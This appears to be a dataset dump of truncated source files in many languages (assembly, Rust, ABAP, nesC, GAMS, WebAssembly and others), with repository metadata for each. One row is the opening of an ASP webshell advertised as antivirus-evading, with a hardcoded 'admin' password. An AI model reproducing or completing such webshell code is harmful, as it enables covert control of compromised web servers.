content stringlengths 4 1.04M | lang stringclasses 358
values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
XDEF _log__r
XDEF _log10__r
SECTION ":0",Code
;----------------------------------------- LOG
_log__r:
log:
stwu r1,-80(r1)
stfd f1,48(r1)
mffs f4
lis r11,19264
log_restart:
stfd f1,32(r1)
lis r3,0
RELOC: 000009ea R_PPC_ADDR16_HA log_table_base
lwz r4,32(r1)
addi r3,r3,0
RELOC: 000009f2 R_PPC... | Parrot Assembly | 3 | privatosan/RayStorm | srcAmiga/lib_ppcmath/log_asm.pasm | [
"MIT"
] |
mod foo {
type T = ();
struct S1(pub(in foo) (), pub(T), pub(crate) (), pub(((), T)));
struct S2(pub((foo)) ());
//~^ ERROR expected one of `)` or `,`, found `(`
//~| ERROR cannot find type `foo` in this scope
}
fn main() {}
| Rust | 2 | Eric-Arellano/rust | src/test/ui/tuple/tuple-struct-fields/test.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
<%@ LANGUAGE = VBScript.encode%><%
Server.ScriptTimeout=999999999
UserPass="admin" '密码
mNametitle ="免杀全球大马" ' 标题
Copyright="admin" '版权
SItEuRl=http://asp-muma.com/" '你的网站
bg ="http://www.7jyewu.cn/webshell/asp.jpg"
ysjb=true '是否有拖动效果,true为是,false为否
function BytesToBstr(body,Cset)
dim objstream
set objstream = S... | ASP | 0 | laotun-s/webshell | www-7jyewu-cn/aspmuma.asp | [
"MIT"
] |
# Práctica 1 - Parte 2
¿Qué lenguaje de programación utiliza el equipo de Netflix?
- Java Web
¿Qué sucedía con la base de datos de Oracle del monolito de Netflix?
- Solo era una pieza del hadware que ejecutaba una gran base de datos
¿Cuál fue una de las principales desventajas que el equipo de Netflix tuvo con la a... | RMarkdown | 1 | jarmarj/DAS_Sistemas | Ene-Jun-2021/monjaras-granados-alicia-montserrat/practica1_SegundoParcial/parte2.rmd | [
"MIT"
] |
INTERFACE zif_abapgit_html_viewer
PUBLIC .
TYPES:
ty_char256 TYPE c LENGTH 256 .
TYPES:
ty_post_data TYPE STANDARD TABLE OF ty_char256 WITH DEFAULT KEY .
TYPES:
BEGIN OF ty_name_value,
name TYPE c LENGTH 30,
value TYPE c LENGTH 250,
END OF ty_name_value .
TYPES:
ty_query_tab... | ABAP | 3 | Manny27nyc/abapGit | src/ui/zif_abapgit_html_viewer.intf.abap | [
"MIT"
] |
{
"cells": [
{
"cell_type": "markdown",
"metadata": {
"collapsed": true
},
"source": [
"# This is a test notebook for recommenders.utils.notebook_utils module"
]
},
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"# set the environ... | Jupyter Notebook | 3 | enowy/Recommenders | tests/unit/recommenders/utils/test_notebook_utils.ipynb | [
"MIT"
] |
// $Id: TinyOSMainP.nc,v 1.4 2010-06-29 22:07:52 scipio Exp $
/* tab:4
* Copyright (c) 2000-2003 The Regents of the University of California.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following condition... | nesC | 5 | mtaghiza/tinyos-main-1 | tos/lib/tosthreads/system/TinyOSMainP.nc | [
"BSD-3-Clause"
] |
"""Test generic (IP camera) diagnostics."""
from homeassistant.components.diagnostics import REDACTED
from tests.components.diagnostics import get_diagnostics_for_config_entry
async def test_entry_diagnostics(hass, hass_client, setup_entry):
"""Test config entry diagnostics."""
assert await get_diagnostics_... | Python | 4 | liangleslie/core | tests/components/generic/test_diagnostics.py | [
"Apache-2.0"
] |
/// <reference path='fourslash.ts'/>
// Regression test for #33386
//// /**
//// * @param {number} var1 **Highlighted text**
//// * @param {string} var2 Another **Highlighted text**
//// */
//// function f1(var1, var2) { }
////
//// /**
//// * @param {number} var1 *Regular text with an asterisk
//// * @param {st... | TypeScript | 4 | monciego/TypeScript | tests/cases/fourslash/quickInfoJsDocTextFormatting1.ts | [
"Apache-2.0"
] |
/*
* Copyright (c) 2021, Linus Groh <linusg@serenityos.org>
*
* SPDX-License-Identifier: BSD-2-Clause
*/
#include <AK/Debug.h>
#include <LibJS/Runtime/GlobalObject.h>
#include <LibJS/Runtime/JobCallback.h>
#include <LibJS/Runtime/Promise.h>
#include <LibJS/Runtime/PromiseJobs.h>
#include <LibJS/Runtime/PromiseReac... | C++ | 5 | r00ster91/serenity | Userland/Libraries/LibJS/Runtime/PromiseJobs.cpp | [
"BSD-2-Clause"
] |
*-------------------------------------------------------------------------------
* ADMM algorithm
*-------------------------------------------------------------------------------
$set phase %1
*-------------------------------------------------------------------------------
$ifthen.a %phase%=='init'
* ADMM residual ba... | GAMS | 5 | witch-team/witchmodel | algo/conv_admm.gms | [
"Apache-2.0"
] |
(module
(type $i32_=>_i32 (func (param i32) (result i32)))
(type $i32_=>_i64 (func (param i32) (result i64)))
(type $i64_=>_i32 (func (param i64) (result i32)))
(type $i64_=>_i64 (func (param i64) (result i64)))
(type $none_=>_none (func))
(global $~lib/memory/__data_end i32 (i32.const 8))
(global $~lib/memory/_... | WebAssembly | 3 | romdotdog/assemblyscript | tests/compiler/cast.untouched.wat | [
"Apache-2.0"
] |
#!/usr/bin/pike
// -*- mode: pike -*-
// $Id: wordfreq.pike,v 1.2 2004-07-03 05:36:11 bfulgham Exp $
// http://shootout.alioth.debian.org/
// from: Fredrik Noring
void main()
{
mapping(string:int) dictionary = ([]);
string buffer = "";
array(string) f = filter(map(enumerate(128),
lambda(int i)
... | Pike | 3 | kragen/shootout | bench/wordfreq/wordfreq.pike | [
"BSD-3-Clause"
] |
import React, {PropTypes} from 'react';
import {HasTutorialTip} from 'nylas-component-kit';
import {getLatestMessage} from './send-reminders-utils'
import SendRemindersPopoverButton from './send-reminders-popover-button';
const SendRemindersPopoverButtonWithTip = HasTutorialTip(SendRemindersPopoverButton, {
title: "... | JSX | 4 | cnheider/nylas-mail | packages/client-app/internal_packages/send-reminders/lib/send-reminders-toolbar-button.jsx | [
"MIT"
] |
@file:JvmMultifileClass
@file:JvmName("otherMultifileFacade")
fun bar() = 24 | Groff | 4 | Mu-L/kotlin | compiler/testData/asJava/ultraLightFacades/multifileFacadeJvmName.kt.1 | [
"ECL-2.0",
"Apache-2.0"
] |
// Just show the page "b"
var render = require("./render");
render(require("./bPage")); | JavaScript | 3 | 1shenxi/webpack | examples/hybrid-routing/bEntry.js | [
"MIT"
] |
/*
* Copyright (c) 2018-2021, Andreas Kling <kling@serenityos.org>
*
* SPDX-License-Identifier: BSD-2-Clause
*/
#pragma once
#include <AK/Types.h>
#include <LibC/sys/arch/i386/regs.h>
#include <Kernel/Arch/x86/ASM_wrapper.h>
#include <Kernel/Arch/x86/CPU.h>
#include <AK/Platform.h>
VALIDATE_IS_X86()
namespace ... | C | 4 | HerrSpace/serenity | Kernel/Arch/x86/RegisterState.h | [
"BSD-2-Clause"
] |
/**
* This file is part of the Phalcon Framework.
*
* (c) Phalcon Team <team@phalcon.io>
*
* For the full copyright and license information, please view the LICENSE.txt
* file that was distributed with this source code.
*/
namespace Phalcon\Annotations;
/**
* Parses docblocks returning an array with the foun... | Zephir | 4 | tidytrax/cphalcon | phalcon/Annotations/ReaderInterface.zep | [
"BSD-3-Clause"
] |
(kicad_pcb (version 20190905) (host pcbnew "5.99.0-unknown-0ecf5de~86~ubuntu18.04.1")
(general
(thickness 1.6)
(drawings 21)
(tracks 87)
(modules 10)
(nets 13)
)
(page "A4")
(layers
(0 "F.Cu" signal)
(31 "B.Cu" signal)
(32 "B.Adhes" user)
(33 "F.Adhes" user)
(34 "B.Past... | KiCad | 5 | OLIMEX/OLINUXINO | HARDWARE/Lime2-SATA/Lime2-SATA_RevA/Lime2-SATA_RevA.kicad_pcb | [
"Unlicense"
] |
// Comparison of k groups with common variance (ANOVA)
data {
int<lower=0> N; // number of observations
int<lower=0> K; // number of groups
int<lower=1,upper=K> x[N]; // discrete group indicators
vector[N] y; // real valued observations
}
parameters {
vector[K] mu; /... | Stan | 5 | tonyctan/BDA_R_demos | demos_rstan/grp_aov.stan | [
"BSD-3-Clause"
] |
// compile-flags: --emit metadata
#![feature(generators, generator_trait)]
use std::marker::Unpin;
use std::ops::Generator;
pub fn g() -> impl Generator<(), Yield = (), Return = ()> {
|| {
yield;
}
}
| Rust | 3 | mbc-git/rust | src/test/ui/generator/auxiliary/metadata-sufficient-for-layout.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
name = "Profile"
uuid = "9abbd945-dff8-562f-b5e8-e1ebf5ef1b79"
[deps]
Printf = "de0858da-6303-5e67-8744-51eddeeeb8d7"
[extras]
Logging = "56ddb016-857b-54e1-b83d-db4d58db5568"
Serialization = "9e88b42a-f829-5b0c-bbe9-9e923198166b"
Test = "8dfed614-e22c-5e08-85e1-65c5234f0b40"
[targets]
test = ["Logging", "Serializat... | TOML | 2 | jonas-schulze/julia | stdlib/Profile/Project.toml | [
"MIT"
] |
<p><?php echo isset($a_cool_var) ? $a_cool_var : ''; ?></p>
| HTML+PHP | 2 | tidytrax/cphalcon | tests/_data/fixtures/views/currentrender/coolVar.phtml | [
"BSD-3-Clause"
] |
#!/bin/bash
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed t... | Shell | 5 | warlock135/grpc | test/distrib/cpp/run_distrib_test_cmake_aarch64_cross.sh | [
"Apache-2.0"
] |
#using owl.v3
# The strings here are just examples; the real tokenizing code is in main.c.
.token hex-color '#fff' '#CC9966'
color = hex-color | 'rgb' '(' number@r ',' number@g ',' number@b ')'
| Web Ontology Language | 4 | numist/owl | example/hex-color/grammar.owl | [
"MIT"
] |
{
"@context": "e127-context-1.jsonld"
}
| JSONLD | 0 | donbowman/rdflib | test/jsonld/1.1/toRdf/e127-context-2.jsonld | [
"BSD-3-Clause"
] |
(set-info :smt-lib-version 2.6)
(set-logic QF_UFLRA)
(set-info :source |CPAchecker with k-induction on SV-COMP14 program using MathSAT5, submitted by Philipp Wendler, http://cpachecker.sosy-lab.org|)
(set-info :category "industrial")
(set-info :status unsat)
(define-fun _1 () Bool true)
(declare-fun |main::lk4@4| () ... | SMT | 1 | livinlife6751/infer | sledge/test/smt/QF_UFLRA/cpachecker-induction-svcomp14/cpachecker-induction.test_locks_12_true-unreach-call_false-termination.c.smt2 | [
"MIT"
] |
-- @shouldFailWith ErrorParsingModule
module Main where
test =
{ "bad"
}
| PureScript | 1 | andys8/purescript | tests/purs/failing/3689.purs | [
"BSD-3-Clause"
] |
? my $context = $main::context;
? my @notes = @_;
<ol class="citations">
? for (my $index = 0; $index < @notes; ++$index) {
<li><?= $notes[$index] ?></li>
? }
</ol>
| Mathematica | 3 | monkpit/JSX | doc/snippets/citations.mt | [
"MIT"
] |
// This source file is part of the Swift.org open source project
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the li... | Swift | 0 | lwhsu/swift | validation-test/compiler_crashers_fixed/00519-void.swift | [
"Apache-2.0"
] |
<div class="entry">
<h1>{{title}}</h1>
<h2>By {{author.name}}</h2>
<div class="body">
{{body}}
</div>
</div>
| Handlebars | 2 | fuelingtheweb/prettier | tests/handlebars/nested-path.hbs | [
"MIT"
] |
intro_theano.pdf: slides_source/intro_theano.tex
cd slides_source; pdflatex --shell-escape intro_theano.tex
mv slides_source/intro_theano.pdf .
| Makefile | 2 | karthikchary/data-science-ipython-notebooks | deep-learning/theano-tutorial/intro_theano/Makefile | [
"Apache-2.0"
] |
ECLASS=extrafiles
INHERITED="$INHERITED $ECLASS"
DESCRIPTION="Base class for applying patches."
#IUSE="${IUSE}"
IUSE="${IUSE} daemontools"
DEPENDS="daemontools? sys-apps/daemontools"
#init_base=${FILESDIR}/init
init_base=${FILESDIR}/extra/init
gentoo_sysv_base=${init_base}/gentoo-sysv
daemontools_base=${init_base... | Gentoo Eclass | 4 | yamadharma/gentoo-portage-local | eclass/extrafiles.eclass | [
"CC-BY-4.0"
] |
cdef int GI_NOOP = 1 << 0
cdef int GI_IGNORE = 1 << 1
cdef int GI_NEEDS_UPDATE = 1 << 2
cdef int GI_GROUP = 1 << 3
cdef int GI_CONTEXT_MOD = 1 << 4
cdef int GI_VERTEX_DATA = 1 << 5
cdef int GI_COMPILER = 1 << 6
cdef int GI_NO_APPLY_ONCE = 1 << 7
cdef int GI_NO_REMOVE = 1 << 8
| Cython | 3 | Galland/kivy | kivy/graphics/opcodes.pxi | [
"MIT"
] |
- dashboard: account_performance
title: Account Performance
layout: newspaper
elements:
- title: Cost by ad network over time
name: Cost by ad network over time
model: google_adwords
explore: master_stats
type: looker_area
fields:
- master_stats.ad_network_type
- master_stats._data_w... | LookML | 3 | umesh0894/google_adwords | account_performance.dashboard.lookml | [
"MIT"
] |
# Check basic include processing.
#
# RUN: %{llbuild} ninja load-manifest %s > %t 2> %t.err
# RUN: %{FileCheck} < %t %s
# RUN: %{FileCheck} --check-prefix=CHECK-ERR < %t.err %s
include Inputs/include-b.ninja
# Check that subninja establishes a new bindings context; this will also create
# a new command using ${parent... | Ninja | 4 | val-verde/swift-llbuild | tests/Ninja/Loader/include.ninja | [
"Apache-2.0"
] |
# ----------------------------------------------------------------------------
# Detect frameworks that may be used by 3rd-party libraries as well as OpenCV
# ----------------------------------------------------------------------------
# --- HPX ---
if(WITH_HPX)
find_package(HPX REQUIRED)
ocv_include_directories(... | CMake | 4 | xipingyan/opencv | cmake/OpenCVFindFrameworks.cmake | [
"Apache-2.0"
] |
import React, { Component, useState } from 'react'
import { computed } from 'mobx'
import { observer } from 'mobx-react'
import { usePopper } from 'react-popper'
import { CircleCI, GitHubActions, Bitbucket, GitLab, AWSCodeBuild, CISingleIcon, CIMultiIcon } from './prompt-images'
import ipc from '../lib/ipc'
const Pro... | JSX | 4 | mm73628486283/cypress | packages/desktop-gui/src/prompts/prompts.jsx | [
"MIT"
] |
# SYNOPSIS
# set -l segs (prompt_segments) # root dir base
#
# OVERVIEW
# Extract the root (top-most parent directory), dirname and basename
# from fish_prompt
function prompt_segments -d "extract root, dir and base from fish_prompt"
set -l root (prompt_pwd | cut -d "/" -f1)
if test -z "$root"
echo "/"
... | fish | 4 | codetriage-readme-bot/oh-my-fish | lib/prompt_segments.fish | [
"MIT"
] |
# Author: Jason Batchelor
# Company: Emerson
# Description: Check if an embedded file contained a RAR, which itself contained an EXE
path(..) | join(" "?) | match("EXTRACT_EMBEDDED Object_.*? EXTRACT_RAR Object_.*? SCAN_YARA ft_exe") | .length > 0
| JSONiq | 3 | akniffe1/fsf | fsf-server/jq/embedded_sfx_rar_w_exe.jq | [
"Apache-2.0"
] |
package com.baeldung.divisionbyzero;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.*;
public class DivisionByZeroUnitTest {
@Test
void givenInt_whenDividedByZero_thenThrowException() {
assertThrows(ArithmeticException.class, () -> {
int result = 12 / 0... | Java | 4 | DBatOWL/tutorials | java-numbers-3/src/test/java/com/baeldung/divisionbyzero/DivisionByZeroUnitTest.java | [
"MIT"
] |
NB. From "Continuing to write in J".
NB. See http://www.jsoftware.com/help/jforc/continuing_to_write_in_j.htm
empno=: 316 317 319 320
payrate=: 60 42 44 54
billrate=: 120 90 90 108
clientlist=: 10011 10012 10025
emp_client=: 10012 10025 10012 10025
hoursworked=: 4 31 $ 8 0 3 10 9 8 8 9 4 0 8 7 10 10 12 9 0 6 8 9 9 9 0... | J | 5 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/J/stwij.ijs | [
"MIT"
] |
//===- nomnigraph/Graph/Graph.h - Basic graph implementation ----*- C++ -*-===//
//
// This file defines a basic graph API for generic and flexible use with
// graph algorithms.
//
//===----------------------------------------------------------------------===//
#ifndef NOM_GRAPH_GRAPH_H
#define NOM_GRAPH_GRAPH_H
#inc... | C | 5 | Hacky-DH/pytorch | caffe2/core/nomnigraph/include/nomnigraph/Graph/Graph.h | [
"Intel"
] |
open util/ordering[Id]
sig Node {
id : one Id,
succ : one Node,
var inbox : set Id,
var outbox : set Id
}
sig Id {}
fact ring {
all i : Id | lone id.i
all n : Node | Node in n.^succ
}
fun elected : set Node {
{n : Node | once (n.id in n.inbox)}
}
pred send [n : Node] {
some i : n.outbox {
n.outbox' = n.o... | Alloy | 4 | Kaixi26/org.alloytools.alloy | org.alloytools.alloy.extra/extra/models/examples/temporal/leader.als | [
"Apache-2.0"
] |
cc_defs = /inc=$(ZLIBSRC)
c_deb =
.ifdef __DECC__
pref = /prefix=all
.endif
OBJS = png.obj, pngset.obj, pngget.obj, pngrutil.obj, pngtrans.obj,\
pngwutil.obj, pngread.obj, pngmem.obj, pngwrite.obj, pngrtran.obj,\
pngwtran.obj, pngrio.obj, pngwio.obj, pngerror.obj, pngpread.obj
CFLAGS= $(C_DEB) ... | Module Management System | 3 | zpc930/visualizationlibrary | src/3rdparty/libpng/scripts/descrip.mms | [
"BSD-2-Clause"
] |
# Copyright 1999-2020 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# @ECLASS: rpm-extended.eclass
# @MAINTAINER:
# Andrew Ammerlaan <andrewammerlaan@gentoo.org>
# @AUTHOR:
# Andrew Ammerlaan <andrewammerlaan@gentoo.org>
# Extension of the rpm.eclass by Alastair Tse <liquidx@gent... | Gentoo Eclass | 5 | gentoo-mirror/natinst | eclass/rpm-extended.eclass | [
"Linux-OpenIB"
] |
CREATE TABLE `tb_owgbdhiwmn` (
`col_nhjtnryfsu` decimal(13,0),
`col_dmrqgaovxi` longblob,
`col_gvwexllvhe` decimal(35) NULL
) DEFAULT CHARSET=utf8;
CREATE TABLE `tb_xlwzxxkunf` LIKE `tb_owgbdhiwmn`;
CREATE TABLE `tb_aidhgjhqzp` (
`col_ouqqfnoijf` tinyint(142) unsigned DEFAULT '1',
`col_wzzrzavmqu` int unsigne... | SQL | 2 | yuanweikang2020/canal | parse/src/test/resources/ddl/alter/test_39.sql | [
"Apache-2.0"
] |
(* This began as a copy of <Puppet> *)
module Tracini =
autoload xfm
(************************************************************************
* INI File settings
*
* puppet.conf only supports "# as commentary and "=" as separator
*************************************************************************)
let co... | Augeas | 4 | jaredjennings/puppet-cmits-augeas | files/1.2.0/lenses/tracini.aug | [
"Apache-2.0"
] |
fs = require 'fs'
{Message,
Actions,
FileUploadStore,
DraftStore} = require 'nylas-exports'
{Upload} = FileUploadStore
msgId = "local-123"
fpath = "/foo/bar/test123.jpg"
fDir = "/foo/bar"
uploadDir = "/uploads"
filename = "test123.jpg"
xdescribe 'FileUploadStore', ->
beforeEach ->
@draft = new Message()
... | CoffeeScript | 4 | cnheider/nylas-mail | packages/client-app/spec/stores/file-upload-store-spec.coffee | [
"MIT"
] |
PROGRAM
MAP
END
CODE
MESSAGE('Hello World!')
RETURN | Clarion | 1 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Clarion/HelloWorld.clw | [
"MIT"
] |
#*****************************************************************************
# *
# Make file for VMS *
# Author : J.Jansen (joukj@hrem.nano.tudelft.nl) *
# Da... | Module Management System | 2 | madanagopaltcomcast/pxCore | examples/pxScene2d/external/WinSparkle/3rdparty/wxWidgets/samples/thread/descrip.mms | [
"Apache-2.0"
] |
/++
Auto-generated Linux syscall constants for X86_64
+/
module mir.linux.arch.x86_64.uapi._asm.unistd;
version(LDC) pragma(LDC_no_moduleinfo);
enum NR_read = 0;
enum NR_write = 1;
enum NR_open = 2;
enum NR_close = 3;
enum NR_stat = 4;
enum NR_fstat = 5;
enum NR_lstat = 6;
enum NR_poll = 7;
enum NR_lseek = 8;
enum NR_... | D | 3 | libmir/mir-linux-kernel | source/mir/linux/arch/x86_64/uapi/_asm/unistd.di | [
"BSL-1.0"
] |
thing temperatureSensor import "temperatureSensor.thingml" assigned sensor
thing airConditioner import "airConditioner.thingml" assigned actuator
thing remoteDisplay import "remoteDisplay.thingml"
thing securityCamera import "securityCamera.thingml" assigned sensitive
thing lightSensor import "lightSensor.thingml"
thin... | Cycript | 4 | atlanmod/wsan | examples/smarthome/main.cy | [
"Apache-2.0"
] |
<GameProjectFile>
<PropertyGroup Type="Node" Name="MissionSelectBackground" ID="72da1054-c5f6-40cb-8798-027466811861" Version="2.0.0.0" />
<Content ctype="GameProjectContent">
<Content>
<Animation Duration="0" Speed="1" />
<ObjectData Name="Scene" CanEdit="False" ctype="SingleNodeObjectData">
... | Csound | 3 | chukong/CocosStudioSamples | DemoMicroCardGame/CocosStudioResources/cocosstudio/MissionSelectBackground.csd | [
"MIT"
] |
rm -f always1 always1.log
cd ..
redo 640-always/always1
cd 640-always
[ "$(wc -l <always1.log)" -eq 1 ] || exit 11
# This shouldn't rebuild, but because other people might be running
# flush-cache in parallel with us, we can't be 100% sure it won't. So don't
# test it.
#redo-ifchange always1
#[ "$(wc -l <always1.log... | Stata | 4 | BlameJohnny/redo | t/640-always/all.do | [
"Apache-2.0"
] |
create table t1 (x real primary key);
| SQL | 3 | imtbkcat/tidb-lightning | tests/routes/data/routes_a0.t1-schema.sql | [
"Apache-2.0"
] |
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applica... | Python | 5 | NasTul/models | official/vision/beta/projects/panoptic_maskrcnn/dataloaders/panoptic_maskrcnn_input.py | [
"Apache-2.0"
] |
-module(bat_erlang).
-export([main/0]).
-record(test, {
name :: list(),
data :: binary()
}).
-define(TESTMACRO, "testmacro").
-spec main() -> ok.
main() ->
%% Handling Lists and Numbers
List = [1, 2, 3, 4, $6, 2#00111],
_Sum = lists:sum(List),
_ = [(N * N) + N / N - N || N <- List, N > 2],
... | Erlang | 5 | JesseVermeulen123/bat | tests/syntax-tests/source/Erlang/bat_erlang.erl | [
"Apache-2.0",
"MIT"
] |
(*
Speaks the date and time of day
Copyright 2008 Apple Inc. All rights reserved.
You may incorporate this Apple sample code into your program(s) without
restriction. This Apple sample code has been provided "AS IS" and the
responsibility for its operation is yours. You are not permitted to
redistribute t... | AppleScript | 4 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/AppleScript/Time Of Day.applescript | [
"MIT"
] |
- id: Search
translation: Vyhledávat
- id: Edit this page
translation: Upravit tuto stránku
- id: Last modified by
translation: Autor poslední změny
- id: Expand
translation: Rozbalit
- id: bookSearchConfig
translation: '{ cache: true }'
| YAML | 2 | sohaoo/LeetCode-Go | website/themes/book/i18n/cs.yaml | [
"MIT"
] |
--TEST--
Flexible heredoc lineno: ensure the compiler globals line number is correct
--FILE--
<?php
$heredoc = <<<EOT
hello world
EOT;
$heredoc = <<<'EOT'
hello world
EOT;
$heredoc = <<<EOT
hello world
EOT;
$heredoc = <<<'EOT'
hello world
EOT;
try {
throw new exception();
} catch (Exception $e) {
var_dump($e... | PHP | 3 | thiagooak/php-src | Zend/tests/flexible-heredoc-nowdoc-lineno.phpt | [
"PHP-3.01"
] |
abbreviation
aircraft
aircraft+flight+flight_no
airfare
airfare+flight
airfare+flight_time
airline
airline+flight_no
airport
capacity
cheapest
city
day_name
distance
flight
flight+airfare
flight+airline
flight_no
flight_no+airline
flight_time
ground_fare
ground_service
ground_service+ground_fare
meal
quantity
restricti... | Mathematica | 1 | shyamalschandra/CNTK | Examples/LanguageUnderstanding/ATIS/BrainScript/intent.wl | [
"MIT"
] |
#%RAML 1.0 Overlay
# Archivo situado en:
# /overlays/es_ES/additionalResources.raml
masterRef: /api.raml
usage: |
Se trata de un español demasiado que describe los recursos adicionales
para la versión 2 del API.
version: v2
/foos:
/bar/{barId}:
get:
description: |
Obtener el foo que se relaciona... | RAML | 3 | zeesh49/tutorials | raml/modularization/overlays/es_ES/additionalResources.raml | [
"MIT"
] |
This library enhances the class definition idiom with saner defaults and more
slot and class options. It wraps around the =hu.dwim.defclass-star= macro,
fixes a few bugs and adds a few more features:
- initform customization (such as zero values);
- type inference (optionally errors out when type cannot be inferred);... | Org | 5 | nathan-jungels/next | libraries/class-star/README.org | [
"BSD-3-Clause"
] |
test = QUnit.test
module = QUnit.module
doc = -> document.cloneNode true
div = -> document.createElement \div
makeArray = -> [].slice.call it
qsa = ( context, q ) -> makeArray( context.querySelectorAll q )
convert-html = ( html ) ->
html
.toLowerCase!
.replace( /[\x20\t\f\s]{2,}/g, '' )
.replace( /[\r\... | LiveScript | 3 | ForkYard/Han | test/index.ls | [
"MIT"
] |
.class public stack_var10
.super java/lang/Object
.field private static n I
.method public <init>()V
.limit stack 5
aload_0
invokenonvirtual java/lang/Object/<init>()V
return
.end method
.method public f()I
.limit stack 8
.limit locals 5
iconst_1
istore_1
iconst_0
istore_2
;; lvar1 is ... | Jasmin | 3 | mauguignard/cbmc | jbmc/regression/jbmc/stack_var10/stack_var10.j | [
"BSD-4-Clause"
] |
000 000 000 000 000 000 000 000 000 000 110 010 000 010 000
000 000 010 000 000 000 000 000 000 000 010 000 000 000 000
000 000 000 000 000 000 011 011 011 011 001 111 010 010 010
000 000 100 010 000 100 000 000 000 000 000 000 000 100 100
000 000 000 100 011 011 000 000 100 010 000 000 000 000 000
000 000 000 000 000 ... | Brainfuck | 0 | Gabrielarodrigues10/ga | b/Binaryfuck.bf | [
"MIT"
] |
--TEST--
BackedEnum::tryFrom() casing in reflection
--FILE--
<?php
enum Foo: string {}
$reflectionEnum = new ReflectionEnum(Foo::class);
$reflectionMethod = $reflectionEnum->getMethod('tryFrom');
echo $reflectionMethod->getName() . "\n";
?>
--EXPECT--
tryFrom
| PHP | 4 | NathanFreeman/php-src | Zend/tests/enum/backed-tryFrom-casing.phpt | [
"PHP-3.01"
] |
RwSimpleProjectLoadComponentV2 {
#name : 'Rowan',
#condition : 'common',
#projectNames : [
'Cypress',
'FileSystemGs',
'RowanClientServices',
'STON'
],
#componentNames : [
'common/AST',
'common/Components',
'common/Core',
'common/Definitions',
'common/Loader',
'common/Specifications',
'common/... | STON | 4 | GemTalk/Rowan | rowan/components/Rowan.ston | [
"MIT"
] |
{
version: '1.0.0',
componentsMap: [
{
package: '@alilc/lowcode-components',
version: '^1.0.0',
componentName: 'Page',
destructuring: true,
exportName: 'Page',
},
{
package: '@alilc/lowcode-components',
version: '^1.0.0',
componentName: 'Table',
dest... | JSON5 | 4 | raymondtm/lowcode-engine | modules/code-generator/test-cases/react-app/demo8-datasource-prop/schema.json5 | [
"MIT"
] |
<!DOCTYPE html>
<html lang="ko">
<head>
<meta charset="utf-8" />
<base href="../../../../" />
<script src="page.js"></script>
<link type="text/css" rel="stylesheet" href="page.css" />
</head>
<body>
[page:BufferAttribute] →
<h1>BufferAttribute Types</h1>
<p class="desc">
three.js에서는 아홉 개의 [pag... | HTML | 3 | yangmengwei925/3d | docs/api/ko/core/bufferAttributeTypes/BufferAttributeTypes.html | [
"MIT"
] |
[${yesterday} 00:00 - 23:59]
<br/>
<br/>
<table rules="all" border="1" >
<tr>
<td>分类</td>
<td>公司</td>
<td>命令字</td>
<td>响应时间(ms)</td>
</tr>
<#list results as result>
<#list result.items as item>
<tr>
<#if item_index == 0>
<td rowspan=${result.size}>${result.id}</td>
</#if>
<td ... | FreeMarker | 3 | woozhijun/cat | cat-home/src/main/resources/freemaker/appDataComparison.ftl | [
"Apache-2.0"
] |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may ... | Scala | 5 | OlegPt/spark | mllib/src/main/scala/org/apache/spark/mllib/evaluation/binary/BinaryLabelCounter.scala | [
"Apache-2.0"
] |
source "../tests/includes/utils.tcl"
proc set_redis_announce_ip {addr} {
foreach_redis_id id {
R $id config set replica-announce-ip $addr
}
}
proc set_sentinel_config {keyword value} {
foreach_sentinel_id id {
S $id sentinel config set $keyword $value
}
}
proc set_all_instances_hostna... | Tcl | 4 | dawnwalk/redis | tests/sentinel/tests/08-hostname-conf.tcl | [
"BSD-3-Clause"
] |
#![allow(unused)]
#![deny(explicit_outlives_requirements)]
// These examples should live in edition-lint-infer-outlives.rs, but are split
// into this separate file because they can't be `rustfix`'d (and thus, can't
// be part of a `run-rustfix` test file) until rust-lang-nursery/rustfix#141
// is solved
mod structs... | Rust | 4 | Eric-Arellano/rust | src/test/ui/rust-2018/edition-lint-infer-outlives-multispan.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
using Uno;
using Uno.Collections;
using Outracks.Simulator.Bytecode;
using Outracks.Simulator.Protocol;
using Uno.Diagnostics;
using Outracks.Simulator;
namespace Fuse.Simulator
{
class DiagnosticsManager : IDisposable
{
readonly ISimulatorClient _client;
readonly object _mutex = new object();
Dictionary<Fuse.... | Uno | 4 | mortend/fuse-studio | Source/Preview/App/Fuse.Simulator/DiagnosticsManager.uno | [
"MIT"
] |
<html>
<body>
${kcSanitize(msg("identityProviderLinkBodyHtml", identityProviderAlias, realmName, identityProviderContext.username, link, linkExpiration, linkExpirationFormatter(linkExpiration)))?no_esc}
</body>
</html> | FreeMarker | 2 | rmartinc/keycloak | themes/src/main/resources/theme/base/email/html/identity-provider-link.ftl | [
"Apache-2.0"
] |
// Code generated by wincallback.go using 'go generate'. DO NOT EDIT.
// External code calls into callbackasm at an offset corresponding
// to the callback index. Callbackasm is a table of MOV and B instructions.
// The MOV instruction loads R12 with the callback index, and the
